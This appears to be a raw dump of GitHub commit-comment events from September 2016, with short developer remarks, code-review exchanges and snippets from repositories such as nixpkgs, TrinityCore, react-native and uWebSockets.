{"id":"4545792921","type":"CommitCommentEvent","actor":{"login":"JeLiZoraSvanula"},"repo":{"name":"JeLiZoraSvanula/slika"},"payload":{"comment":{"id":18976949,"position":null,"line":null,"path":null,"commit_id":"6994450ae68f9bcf540fa07fefd2a9ed1fd377a9","created_at":"2016-09-11T13:06:39Z","updated_at":"2016-09-11T13:06:39Z","body":"od ove slike pocinjem"}},"created_at":"2016-09-11T13:06:39Z"}
{"id":"4545796510","type":"CommitCommentEvent","actor":{"login":"anantharam"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18976954,"position":54,"line":80,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-11T13:09:28Z","updated_at":"2016-09-11T13:09:28Z","body":"Why exactly was this changed to fetch only the latitudes and logitudes of the city and country alone instead fo the full address?"}},"created_at":"2016-09-11T13:09:28Z"}
{"id":"4545798169","type":"CommitCommentEvent","actor":{"login":"ridjalfathoni"},"repo":{"name":"ridjalfathoni/DevelopmentForm"},"payload":{"comment":{"id":18976955,"position":null,"line":null,"path":null,"commit_id":"914c67061deb806d31637f6c0560cf2d22f7f1a4","created_at":"2016-09-11T13:10:40Z","updated_at":"2016-09-11T13:10:40Z","body":"![screenshot_2](https://cloud.githubusercontent.com/assets/21316966/18417472/c6012566-785b-11e6-9a46-dc3c95393f29.png)\r\n![screenshot_3](https://cloud.githubusercontent.com/assets/21316966/18417473/c6282922-785b-11e6-9e62-36265b83b493.png)\r\n![screenshot_4](https://cloud.githubusercontent.com/assets/21316966/18417474/c630539a-785b-11e6-9c91-dd43a7014b74.png)\r\n"}},"created_at":"2016-09-11T13:10:40Z"}
{"id":"4545800816","type":"CommitCommentEvent","actor":{"login":"TimHeckel"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":18976956,"position":null,"line":null,"path":null,"commit_id":"26d082b62ef6f6d92e80f69f18b6bede65bd7e98","created_at":"2016-09-11T13:12:35Z","updated_at":"2016-09-11T13:12:35Z","body":"I can see @kentonv's PR merged in my upgraded meteor code now, but strangely when I ran `meteor update` I saw this: \r\n\r\n    Changes to your project's package version selections from updating package versions:\r\n    promise                               upgraded from 0.8.4 to 0.8.7\r\n\r\nI expected the version to be bumped to `0.8.5`? This is nothing critical, I just don't understand where the `0.8.7` is coming from? Also, I am in the process of vetting this PR in our environment...many many thanks again to @kentonv for diagnosing this issue."}},"created_at":"2016-09-11T13:12:35Z"}
{"id":"4545800873","type":"CommitCommentEvent","actor":{"login":"aszasz"},"repo":{"name":"protocubo/the-online-brt-planning-guide"},"payload":{"comment":{"id":18976957,"position":null,"line":null,"path":null,"commit_id":"5da545a7fae0732fa886e413fcc3722cac214198","created_at":"2016-09-11T13:12:40Z","updated_at":"2016-09-11T13:12:40Z","body":"Sorry...This was supposed to be pushed on my repo... I was just stashing to pick development advances.\r\n"}},"created_at":"2016-09-11T13:12:40Z"}
{"id":"4545800962","type":"CommitCommentEvent","actor":{"login":"wakaber"},"repo":{"name":"nitrogen-os-devices/android_vendor_lge_hammerhead"},"payload":{"comment":{"id":18976958,"position":null,"line":null,"path":null,"commit_id":"d7a5ed70db5628c780d3dd14181b0e70451003e6","created_at":"2016-09-11T13:12:43Z","updated_at":"2016-09-11T13:12:43Z","body":"@Mr-MEX \r\nС Z3 тоже не покатило."}},"created_at":"2016-09-11T13:12:43Z"}
{"id":"4545805467","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":18976960,"position":null,"line":null,"path":null,"commit_id":"259a949fa0ae810a2eb3a89daf4f2aa96e4005ec","created_at":"2016-09-11T13:16:05Z","updated_at":"2016-09-11T13:16:05Z","body":"@cala and all that who want test guardianai\r\n\r\n- add this @cala script to db\r\n```sql\r\nDELETE FROM `creature_ai_scripts` WHERE `creature_id` = 15720;\r\nINSERT INTO `creature_ai_scripts` VALUES\r\n(1572001, 15720, 14, 0, 100, 1, 1000, 40, 15000, 18000, 11, 11986, 6, 1, 0, 0, 0, 0, 0, 0, 0, 0, 'Timbermaw Ancestor - Cast Healing Wave on Friendlies'),\r\n(1572002, 15720, 0, 0, 100, 1, 0, 40, 3400, 4800, 11, 9532, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 'Timbermaw Ancestor - Cast Lightning Bolt');\r\n\r\nUPDATE creature_template SET AIName='GuardianAI' WHERE Entry=15720;\r\n```\r\n- setup a char level 60\r\n- .additem 21326\r\n- .mod rep 576 50000\r\n- select your char then -> .damage XXXX (where XXXX is a value that will do at least 50% damage on you)\r\n- equip the item and use it.\r\n- you can also use it while in combat."}},"created_at":"2016-09-11T13:16:05Z"}
{"id":"4545805641","type":"CommitCommentEvent","actor":{"login":"ZoomTen"},"repo":{"name":"ZoomTen/splash-rx"},"payload":{"comment":{"id":18976961,"position":null,"line":null,"path":null,"commit_id":"ec29a78fba5d1a0631c1a76fe4164d7974905382","created_at":"2016-09-11T13:16:11Z","updated_at":"2016-09-11T13:16:11Z","body":"OOOOH MY GOD LOOOOL\r\n\r\nI CAN'T WITH THAT!"}},"created_at":"2016-09-11T13:16:11Z"}
{"id":"4545806163","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18976962,"position":11,"line":14,"path":"HelloWorld/Program.cs","commit_id":"defa80ab4e5fa9e19f57860fe01c68f1a92117b2","created_at":"2016-09-11T13:16:34Z","updated_at":"2016-09-11T13:16:34Z","body":"Нужно сделать так, чтобы это было две разные функции. Первая - это изначальная sugar(), которая расчитывает количество сахара. А вторая, enoughSugar() - вызывает первую и сравнивает расчитанное кличество сахара с доступным."}},"created_at":"2016-09-11T13:16:34Z"}
{"id":"4545807640","type":"CommitCommentEvent","actor":{"login":"fr34kyn01535"},"repo":{"name":"RocketMod/Rocket"},"payload":{"comment":{"id":18976963,"position":null,"line":null,"path":null,"commit_id":"069fc895b8874e9024c9f67d2a54bd121f123fde","created_at":"2016-09-11T13:17:47Z","updated_at":"2016-09-11T13:17:47Z","body":"Its a name ;D"}},"created_at":"2016-09-11T13:17:47Z"}
{"id":"4545810414","type":"CommitCommentEvent","actor":{"login":"shubhiD"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18976965,"position":54,"line":80,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-11T13:19:55Z","updated_at":"2016-09-11T13:19:55Z","body":"To resolve errors encountered while passing whole address"}},"created_at":"2016-09-11T13:19:55Z"}
{"id":"4545812937","type":"CommitCommentEvent","actor":{"login":"fridabaharizki"},"repo":{"name":"fridabaharizki/PIZZAHAHA"},"payload":{"comment":{"id":18976967,"position":9,"line":9,"path":"README.md","commit_id":"5d31957bb549bd7006a9a4687485b58375d8a1db","created_at":"2016-09-11T13:21:43Z","updated_at":"2016-09-11T13:21:43Z","body":"https://doc-0o-0g-docs.googleusercontent.com/docs/securesc/b8ucl63gjolktfrkvm6rgk7sl556rdpk/8sdpu3p90pgp98neu1mm48o47fp2omkj/1473595200000/04520826706803978470/04520826706803978470/0B-L5pZMtb_ElNjhMVzhJLVF0cVk?h=17369219939809379266&e=download"}},"created_at":"2016-09-11T13:21:43Z"}
{"id":"4545814504","type":"CommitCommentEvent","actor":{"login":"globalnetupc"},"repo":{"name":"globalnetupc/karaoke"},"payload":{"comment":{"id":18976973,"position":null,"line":null,"path":null,"commit_id":"abd294869fc15fb8626f1e6ccbde1f4032e2c836","created_at":"2016-09-11T13:22:53Z","updated_at":"2016-09-11T13:22:53Z","body":"El objetivo de este proyecto es atender el requerimiento de una cadena de karaokes, por lo que usaremos para su desarrollo el metodo scrum como metodo de proyecto, en nuestro primer paso es verificar las historias de los usuarios del proyecto, con el objetivo de ejecutar una distribucion de los mismos en el Equipo de trabajo y analizar los criterios necesarios para proponer en el desarrollo de los sprint."}},"created_at":"2016-09-11T13:22:53Z"}
{"id":"4545815880","type":"CommitCommentEvent","actor":{"login":"nealgosalia"},"repo":{"name":"dev-harsh1998/misc"},"payload":{"comment":{"id":18976978,"position":null,"line":null,"path":null,"commit_id":"70703670bc93fb9d32a9ed637eab993d8e0db3e6","created_at":"2016-09-11T13:23:53Z","updated_at":"2016-09-11T13:23:53Z","body":"Kaise ho beta? Abhi tak akkal nahi aayi?"}},"created_at":"2016-09-11T13:23:53Z"}
{"id":"4545817442","type":"CommitCommentEvent","actor":{"login":"zhangtao818620"},"repo":{"name":"zhangtao818620/zhangtao818620.github.io"},"payload":{"comment":{"id":18976979,"position":null,"line":null,"path":null,"commit_id":"1743cf44e09477f9245e26bae8cb11065baebe51","created_at":"2016-09-11T13:25:05Z","updated_at":"2016-09-11T13:25:05Z","body":"阿萨德"}},"created_at":"2016-09-11T13:25:05Z"}
{"id":"4545818185","type":"CommitCommentEvent","actor":{"login":"kutsys"},"repo":{"name":"kutsys/2013180035"},"payload":{"comment":{"id":18976980,"position":1,"line":1,"path":"README.md","commit_id":"8887d7ad4f8242f1e7ef850a4c8c5ef0a3d3461d","created_at":"2016-09-11T13:25:38Z","updated_at":"2016-09-11T13:25:38Z","body":"2013180035 김하늘"}},"created_at":"2016-09-11T13:25:38Z"}
{"id":"4545818475","type":"CommitCommentEvent","actor":{"login":"fmerakos"},"repo":{"name":"fmerakos/R-code"},"payload":{"comment":{"id":18976981,"position":null,"line":null,"path":null,"commit_id":"8bdbc675a6f948f6719cc6566bbc23a7f4b35d0f","created_at":"2016-09-11T13:25:51Z","updated_at":"2016-09-11T13:25:51Z","body":"R code to process the Airplane crashes since 1908 data."}},"created_at":"2016-09-11T13:25:51Z"}
{"id":"4545819077","type":"CommitCommentEvent","actor":{"login":"quyencao"},"repo":{"name":"quyencao/Higher-Order-Component-React-Redux"},"payload":{"comment":{"id":18976982,"position":5,"line":8,"path":"src/components/require_authentication.js","commit_id":"27d8d432d533422ea75e68700125886260609abe","created_at":"2016-09-11T13:26:17Z","updated_at":"2016-09-11T13:26:17Z","body":"must be contextTypes"}},"created_at":"2016-09-11T13:26:17Z"}
{"id":"4545820687","type":"CommitCommentEvent","actor":{"login":"Anarchid"},"repo":{"name":"springweblobby/swl-website"},"payload":{"comment":{"id":18976983,"position":null,"line":null,"path":null,"commit_id":"fe30568d747b48419cb2f6c74ae211b0bd273e88","created_at":"2016-09-11T13:27:37Z","updated_at":"2016-09-11T13:27:37Z","body":"Brutal"}},"created_at":"2016-09-11T13:27:37Z"}
{"id":"4545823190","type":"CommitCommentEvent","actor":{"login":"BVMSR24"},"repo":{"name":"BVMSR24/turorials"},"payload":{"comment":{"id":18976984,"position":null,"line":null,"path":null,"commit_id":"994c96d3160e92142b321448ba89ab963ee99bc9","created_at":"2016-09-11T13:29:31Z","updated_at":"2016-09-11T13:29:31Z","body":"This is my first "}},"created_at":"2016-09-11T13:29:31Z"}
{"id":"4545823219","type":"CommitCommentEvent","actor":{"login":"OverG0d"},"repo":{"name":"OverG0d/Projects"},"payload":{"comment":{"id":18976985,"position":13,"line":13,"path":"README.md","commit_id":"f633b123f9cfb1cb459618dcd35402d3e4545356","created_at":"2016-09-11T13:29:32Z","updated_at":"2016-09-11T13:29:32Z","body":"//"}},"created_at":"2016-09-11T13:29:32Z"}
{"id":"4545824477","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"bliss-cancro/platform_manifest"},"payload":{"comment":{"id":18976987,"position":null,"line":null,"path":null,"commit_id":"39ced5775952f976b4aa636de734044bac2fc3fa","created_at":"2016-09-11T13:30:24Z","updated_at":"2016-09-11T13:30:24Z","body":"hardware/qcom/power useless"}},"created_at":"2016-09-11T13:30:24Z"}
{"id":"4545824921","type":"CommitCommentEvent","actor":{"login":"johanperezrd"},"repo":{"name":"kadirgun/heroku"},"payload":{"comment":{"id":18976988,"position":null,"line":null,"path":null,"commit_id":"f48ce5fd85cc11c8ed676014647f940fa7578222","created_at":"2016-09-11T13:30:43Z","updated_at":"2016-09-11T13:30:43Z","body":"Hola Kadir Gun, quiero comprarte esa extencion para facebook escribeme porfa \r\n\r\nhttp://i.imgur.com/2H3tBwn.png "}},"created_at":"2016-09-11T13:30:43Z"}
{"id":"4545825580","type":"CommitCommentEvent","actor":{"login":"johanperezrd"},"repo":{"name":"kadirgun/coffee"},"payload":{"comment":{"id":18976989,"position":null,"line":null,"path":null,"commit_id":"69ecbb45022b9dad15d2c03ba322b7177643e66a","created_at":"2016-09-11T13:31:11Z","updated_at":"2016-09-11T13:31:11Z","body":"Hola Kadir Gun, quiero comprarte esa extencion para facebook escribeme porfa \r\n\r\nhttp://i.imgur.com/2H3tBwn.png "}},"created_at":"2016-09-11T13:31:11Z"}
{"id":"4545826766","type":"CommitCommentEvent","actor":{"login":"shubhiD"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18976990,"position":5,"line":60,"path":"geocodertest.py","commit_id":"fd9fb12ae029e1cb6a0151125674da8285802cbe","created_at":"2016-09-11T13:32:06Z","updated_at":"2016-09-11T13:32:06Z","body":"prec_loc = precise location and its value is \"true\" for the images having correct(supposedly) lat and lng  "}},"created_at":"2016-09-11T13:32:06Z"}
{"id":"4545827919","type":"CommitCommentEvent","actor":{"login":"OverG0d"},"repo":{"name":"OverG0d/Projects"},"payload":{"comment":{"id":18976991,"position":43,"line":43,"path":"README.md","commit_id":"f633b123f9cfb1cb459618dcd35402d3e4545356","created_at":"2016-09-11T13:33:00Z","updated_at":"2016-09-11T13:33:00Z","body":"//Result\r\n//Welcome to guessing game!\r\n//Guess a number\r\n1\r\n5\r\nThe correct number is lower.\r\n4\r\nThe correct number is lower.\r\n3\r\nThe correct number is lower.\r\nYou lose!"}},"created_at":"2016-09-11T13:33:00Z"}
{"id":"4545828657","type":"CommitCommentEvent","actor":{"login":"bam80"},"repo":{"name":"OpenELEC/OpenELEC.tv"},"payload":{"comment":{"id":18976992,"position":null,"line":null,"path":null,"commit_id":"18b8ba44a4169f2d6dfe3239721d7bcfcce4e280","created_at":"2016-09-11T13:33:30Z","updated_at":"2016-09-11T13:33:30Z","body":"Can we push it upstream?"}},"created_at":"2016-09-11T13:33:30Z"}
{"id":"4545830580","type":"CommitCommentEvent","actor":{"login":"mdorman"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976994,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-11T13:34:58Z","updated_at":"2016-09-11T13:34:58Z","body":"@ttuegel I hadn't noted that about melpa2nix.\r\n\r\n@shlevy I suppose that's a possibility, though my question to @ttuegel is intended to take an even further step back and ask: why maintain the year-out-of-date, hand-rolled `helm-bibtex` expression at all, when we've got a perfectly good, up-to-date one in `melpaPackages`?\r\n\r\nBasically, if you go through `emacs-packages.nix`, the *vast* majority of those expressions (though not all...some represent things like `cask` which have external dependencies that might be hard to handle in a generated file) are hand-rolled, effectively identical except for being out-of-date, version of expressions that are also available in one of the automatically-generated files.\r\n\r\nWhen I submitted a change...oh, 8 or 9 months ago, I think, to remove at least all the obvious duplicates, it got reverted because it broke peoples' configurations...which is why I know that you probably broke `helm-bibtex`. :)  And I was fine with that revert, but it seems to me like we should be figuring out a path for eliminating the problem.\r\n\r\nThe thing that seems obvious to me---but I suspect runs afoul of the challenges I have understanding the twisty recursive nature of the overall nix expression---is to, instead of having `emacs-packages.nix` contain:\r\n\r\n```\r\nac-haskell-process = melpaBuild rec {\r\n  pname   = \"ac-haskell-process\";\r\n  version = \"0.5\";\r\n  src = fetchFromGitHub {\r\n    owner  = \"purcell\";\r\n    repo   = pname;\r\n    rev    = version;\r\n    sha256 = \"0dlrhc1dmzgrjvcnlqvm6clyv0r6zray6qqliqngy14880grghbm\";\r\n  };\r\n  packageRequires = [ auto-complete haskell-mode ];\r\n  meta = {\r\n    description = \"Haskell code completion for auto-complete Emacs framework\";\r\n    license = gpl3Plus;\r\n  };\r\n```\r\n(incidentally, a release from 2014) have it instead say:\r\n```\r\nac-haskell-process = melpaStablePackages.ac-haskell-process\r\n```\r\nwhich picks up the latest version (even though that's only from 2015, still a year fresher).  And instead of the `emacsPackagesGen` expression in `all-packages.nix` contain:\r\n```\r\nxmlRpc = callPackage ../applications/editors/emacs-modes/xml-rpc { };\r\n```\r\nwhich points to a version of `xml-rpc.el` which has some non-trivial bugs in it, why couldn't it reference the one in `melpaStablePackages`?\r\n\r\nI would be happy to do the actual legwork on this stuff---few things make me as happy as deleting obsolete code---but I would like to avoid repeating my prior change's breaking behavior, and I'm not sure how best to go about that.  But it seems to me that we should end up with a much less crufty emacs setup."}},"created_at":"2016-09-11T13:34:58Z"}
{"id":"4545832831","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976995,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-11T13:36:37Z","updated_at":"2016-09-11T13:36:37Z","body":"I think we should remove the duplicates in master, and document the change. This is why we have stable vs unstable branches."}},"created_at":"2016-09-11T13:36:37Z"}
{"id":"4545832883","type":"CommitCommentEvent","actor":{"login":"Tauriella"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18976996,"position":null,"line":null,"path":null,"commit_id":"5c92f5ba5e3422ccd2f75233f762962c7270c90a","created_at":"2016-09-11T13:36:38Z","updated_at":"2016-09-11T13:36:38Z","body":"I have now a Cmake error\r\n\r\nCMake Error at cmake/macros/FindOpenSSL.cmake:226 (message):\r\n  TrinityCore needs OpenSSL version 1.0 but found version 1.1.0\r\nCall Stack (most recent call first):\r\n  dep/openssl/CMakeLists.txt:16 (find_package)"}},"created_at":"2016-09-11T13:36:38Z"}
{"id":"4545833837","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976997,"position":null,"line":null,"path":null,"commit_id":"18470b34d09c5c060f616eefea7c83f460af8dae","created_at":"2016-09-11T13:37:21Z","updated_at":"2016-09-11T13:37:21Z","body":"i don't think i was able to find it @rickyc :("}},"created_at":"2016-09-11T13:37:21Z"}
{"id":"4545833941","type":"CommitCommentEvent","actor":{"login":"bwagnerr"},"repo":{"name":"pixelated/pixelated-user-agent"},"payload":{"comment":{"id":18976998,"position":null,"line":null,"path":null,"commit_id":"69cbc6713bb156a845e9a616b35927cfce8cf70c","created_at":"2016-09-11T13:37:26Z","updated_at":"2016-09-11T13:37:26Z","body":"Yes, that's true, I'll add a small sleep after each try to solve this problem."}},"created_at":"2016-09-11T13:37:26Z"}
{"id":"4545834002","type":"CommitCommentEvent","actor":{"login":"revalani"},"repo":{"name":"revalani/escola_c-_WForm"},"payload":{"comment":{"id":18977001,"position":null,"line":null,"path":null,"commit_id":"182f5eda86ffa18889f2504f7f453c04f3128b42","created_at":"2016-09-11T13:37:28Z","updated_at":"2016-09-11T13:37:28Z","body":"inicio"}},"created_at":"2016-09-11T13:37:28Z"}
{"id":"4545834310","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18977002,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-11T13:37:41Z","updated_at":"2016-09-11T13:37:41Z","body":"But if people insist on keeping the old names around forever, just aliasing the melpa packages makes the most sense."}},"created_at":"2016-09-11T13:37:41Z"}
{"id":"4545834464","type":"CommitCommentEvent","actor":{"login":"ishitatsuyuki"},"repo":{"name":"iTXTech/DevTools"},"payload":{"comment":{"id":18977003,"position":null,"line":null,"path":null,"commit_id":"5fab38943b6c302ee9dddea90b8b38e9c6ebe31e","created_at":"2016-09-11T13:37:47Z","updated_at":"2016-09-11T13:37:47Z","body":"By the way, this doesn't mean that it will reload the content. Beware."}},"created_at":"2016-09-11T13:37:47Z"}
{"id":"4545835722","type":"CommitCommentEvent","actor":{"login":"joshuapinter"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18977004,"position":null,"line":null,"path":null,"commit_id":"f4dbf37ba85acb988bbb26e339ea7f7536b1f931","created_at":"2016-09-11T13:38:47Z","updated_at":"2016-09-11T13:38:47Z","body":"Super strange but in order for `PushNotificationIOS.requestPermissions()` to resolve the `Promise`, you _need_ to add an event listener, like this: \r\n\r\n```js\r\nPushNotificationIOS.addEventListener('register', (token) => {});\r\n```\r\n\r\nWhat's even more interesting is that it doesn't even have to be the `'register'` event, it could be `'notification'` or `'localNotification'` as well and they all work.\r\n\r\nSo this is what I ended up using anywhere I needed to get and handle the `requestPermissions()` Promise resolve:\r\n\r\n```js\r\ncomponentWillMount() {\r\n  // NOTE: You absolutely need this for requestPermissions() promise to resolve.   \r\n  PushNotificationIOS.addEventListener('register', (token) => {});\r\n}\r\n\r\ncomponentWillUnmount() {\r\n  PushNotificationIOS.removeEventListener('register', (token) => {});\r\n}\r\n```"}},"created_at":"2016-09-11T13:38:47Z"}
{"id":"4545836377","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"GuneetAtwal/kenzo"},"payload":{"comment":{"id":18977005,"position":null,"line":null,"path":null,"commit_id":"003125dbbba200cc661a28de87c3bf0ba87b0812","created_at":"2016-09-11T13:39:22Z","updated_at":"2016-09-11T13:39:22Z","body":"Combined with Dynamic FSync, it may cause random reboots mate."}},"created_at":"2016-09-11T13:39:22Z"}
{"id":"4545836788","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18977006,"position":null,"line":null,"path":null,"commit_id":"5c92f5ba5e3422ccd2f75233f762962c7270c90a","created_at":"2016-09-11T13:39:39Z","updated_at":"2016-09-11T13:39:39Z","body":"how about... intended?\r\nhttps://github.com/TrinityCore/TrinityCore/issues/17929\r\nhttps://trinitycore.atlassian.net/wiki/display/tc/Requirements"}},"created_at":"2016-09-11T13:39:39Z"}
{"id":"4545837929","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18977007,"position":54,"line":80,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-11T13:40:30Z","updated_at":"2016-09-11T13:40:30Z","body":"What errors you mean? This is wrong. It's fine to have less data rather than wrong data"}},"created_at":"2016-09-11T13:40:30Z"}
{"id":"4545839813","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977010,"position":37,"line":47,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:41:53Z","updated_at":"2016-09-11T13:41:53Z","body":"@erinl1 Actually, you should of did. Looks like you noticed the function wasn't working. Declaring a function doesn't do anything until you call it. Here's an example.\r\n\r\n```js\r\nfunction sayHello() {\r\n  console.log(\"Hello\");\r\n}\r\n```\r\n\r\nThat doesn't do anything until I type this `sayHello();`."}},"created_at":"2016-09-11T13:41:53Z"}
{"id":"4545840105","type":"CommitCommentEvent","actor":{"login":"shubhiD"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18977011,"position":54,"line":80,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-11T13:42:06Z","updated_at":"2016-09-11T13:42:06Z","body":"wrong in the sense that no coordinates were fetched"}},"created_at":"2016-09-11T13:42:06Z"}
{"id":"4545840726","type":"CommitCommentEvent","actor":{"login":"RevEdgar"},"repo":{"name":"awg24/project-awesimo"},"payload":{"comment":{"id":18977012,"position":null,"line":null,"path":null,"commit_id":"afede9466d941c7ad648ef90b649f39f4ce50347","created_at":"2016-09-11T13:42:33Z","updated_at":"2016-09-11T13:42:33Z","body":"hello "}},"created_at":"2016-09-11T13:42:33Z"}
{"id":"4545841220","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18977013,"position":null,"line":null,"path":null,"commit_id":"5c92f5ba5e3422ccd2f75233f762962c7270c90a","created_at":"2016-09-11T13:42:55Z","updated_at":"2016-09-11T13:42:55Z","body":"> TrinityCore needs OpenSSL version 1.0 but found version 1.1.0\r\n\r\nI don't know how it can get clear than that."}},"created_at":"2016-09-11T13:42:55Z"}
{"id":"4545841384","type":"CommitCommentEvent","actor":{"login":"leo"},"repo":{"name":"RocketMod/Rocket"},"payload":{"comment":{"id":18977014,"position":null,"line":null,"path":null,"commit_id":"069fc895b8874e9024c9f67d2a54bd121f123fde","created_at":"2016-09-11T13:43:04Z","updated_at":"2016-09-11T13:43:04Z","body":"O.o"}},"created_at":"2016-09-11T13:43:04Z"}
{"id":"4545842161","type":"CommitCommentEvent","actor":{"login":"Scottydgregory"},"repo":{"name":"franciscop/cookies.js"},"payload":{"comment":{"id":18977016,"position":3,"line":3,"path":"bower.json","commit_id":"fd4b02b6b5dc8d26cd91a97d9c2c83a8e68a99a3","created_at":"2016-09-11T13:43:39Z","updated_at":"2016-09-11T13:43:39Z","body":"Version;1.1.3\"_.<~"}},"created_at":"2016-09-11T13:43:39Z"}
{"id":"4545842424","type":"CommitCommentEvent","actor":{"login":"OldSnake22"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18977017,"position":null,"line":null,"path":null,"commit_id":"83acf5bc144e0a52292a71106d9b7f0352a41297","created_at":"2016-09-11T13:43:52Z","updated_at":"2016-09-11T13:43:52Z","body":"Awesome, thank a lot for this one !"}},"created_at":"2016-09-11T13:43:52Z"}
{"id":"4545843506","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977018,"position":16,"line":39,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:44:42Z","updated_at":"2016-09-11T13:44:42Z","body":"Okay, we need to step through each line of code. I'll help you with some of them. When the page loads, you are creating a variable called `user`. Think of this as taking an envelope (`var`) and writing the name `user` on it.\r\n\r\nThen you are assigning it an object with keys `email` and `password`. The values of the keys are retrieved from the respective inputs.\r\n\r\nDoes that make sense so far?"}},"created_at":"2016-09-11T13:44:42Z"}
{"id":"4545843659","type":"CommitCommentEvent","actor":{"login":"globalnetupc"},"repo":{"name":"globalnetupc/karaoke"},"payload":{"comment":{"id":18977019,"position":null,"line":null,"path":null,"commit_id":"abd294869fc15fb8626f1e6ccbde1f4032e2c836","created_at":"2016-09-11T13:44:49Z","updated_at":"2016-09-11T13:44:49Z","body":"Distrbucion de Historias para el Equipo.\r\nHU01. Mantenimiento de Locales    (Juan Pablo)\r\nHU02. Mantenimiento de Salas        (Luis Cruzado)\r\nHU03. Mantener productos              (Isaac)\r\nHU04. Mantener Eventos                  (Juan Pablo)\r\nHU05. Mantener Reservas                 (Josue)\r\nHU06. Generar comprobante de pago   (Juan Pablo)\r\nHU07. Registrar reservas de salas           (Isaac)\r\nHU08. Realizar pedidos de canciones y productos   (Josue)\r\nUS09. Comentar acerca de las Salas (Luis Cruzado)\r\nHU10. Generar indicadores de ventas (Isaac)\r\n"}},"created_at":"2016-09-11T13:44:49Z"}
{"id":"4545844827","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977021,"position":24,"line":44,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:45:39Z","updated_at":"2016-09-11T13:45:39Z","body":"Let's talk about this part. `email` and `hello`.\r\n\r\n`email` is the `key`\r\n`hello` is the `value\r\n\r\nWhat data type is `hello` right now? That's a question for you."}},"created_at":"2016-09-11T13:45:39Z"}
{"id":"4545844846","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977022,"position":null,"line":null,"path":null,"commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T13:45:40Z","updated_at":"2016-09-11T13:45:40Z","body":"This commit increases Node.js performance by about 100% in throughput:\r\n\r\nThroughput: 20k, 20, 10, 3000:\r\n\r\nNode.js (before): 300 echoes/ms\r\nNode.js (now): 570 echoes/ms\r\nC++: 1100 echoes/ms\r\n\r\nThroughput: 1, 20, 2000, 3000:\r\n\r\nNode.js (before): 450 echoes/ms\r\nNode.js (now): 1000 echoes/ms\r\nC++: about 5000 echoes/ms (don't care to remember)\r\n\r\n@lpinca This will break the Primus transformer, and might break your app if you expect to receive binary data as Node.js Buffer. All binary data is now ArrayBuffer which can be wrapped into a Node.js Buffer or any TypedArray like Uint8Array, etc."}},"created_at":"2016-09-11T13:45:40Z"}
